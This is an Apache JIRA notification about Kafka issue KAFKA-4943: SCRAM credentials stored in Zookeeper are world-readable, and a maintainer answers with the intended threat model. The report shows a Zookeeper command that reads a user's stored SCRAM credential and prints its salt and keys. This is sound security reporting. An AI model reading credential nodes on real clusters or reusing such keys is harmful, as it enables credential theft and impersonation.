[ https://issues.apache.org/jira/browse/KAFKA-4943?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15938726#comment-15938726 ]
Rajini Sivaram commented on KAFKA-4943: --------------------------------------- The current SCRAM implementation uses the default ACL settings for Kafka with the expectation that SCRAM credentials are stored in Zookeeper only in installations where Zookeeper is safe (secure disk, network segmentation to restrict access etc.). Since ZK traffic is not encrypted, is would be unsafe to use ZK as the credential store in clusters where ZK is not fully secure. KIP-86 (https://cwiki.apache.org/confluence/display/KAFKA/KIP-86%3A+Configurable+SASL+callback+handlers) will enable a pluggable credential store for environments where ZK is insecure. Having said that, we could probably do better for the default case as suggested here. > SCRAM secret's should be better protected with Zookeeper ACLs > ------------------------------------------------------------- > > Key: KAFKA-4943 > URL: https://issues.apache.org/jira/browse/KAFKA-4943 > Project: Kafka > Issue Type: Improvement > Reporter: Johan Ström > > With the new SCRAM authenticator the secrets are stored in Zookeeper: > {code} > get /kafka/config/users/alice > {"version":1,"config":{"SCRAM-SHA-512":"salt=ODhnZjNkdWZibTV1cG1zdnV6bmh6djF3Mg==,stored_key=BAbHWHuGEb4m5+U+p0M9oFQmOPhU6M7q5jtZY8deDDoZCvxaqVNLz41yPzdgcp1WpiEBmfwYOuFlo9hMFKM7mA==,server_key=JW3KhpMeyUgh0OAC0kejuFUvUSlXBv/Z68tlfOWcMw5f5jrBwyBnjNQ9VZsSYz1AcI9IYaQ5S6H3yN39SieNiA==,iterations=4096"}} > {code} > These are stored without any ACL, and zookeeper-security-migration.sh does > not seem to change that either: > {code} > getAcl /kafka/config/users/alice > 'world,'anyone > : cdrwa > getAcl /kafka/config/users > 'world,'anyone > : cdrwa > getAcl /kafka > 'world,'anyone > : r > 'sasl,'bob > : cdrwa > getAcl /kafka/config/changes > 'world,'anyone > : r > 'sasl,'bob > : cdrwa > {code} > The above output is after running security migrator, for some reason > /kafka/config/users is ignored, but others are fixed.. > Even if these where to be stored with secure ZkUtils#DefaultAcls, they would > be world readable. > From my (limited) point of view, they should be readable by Kafka only. -- This message was sent by Atlassian JIRA (v6.3.15#6346)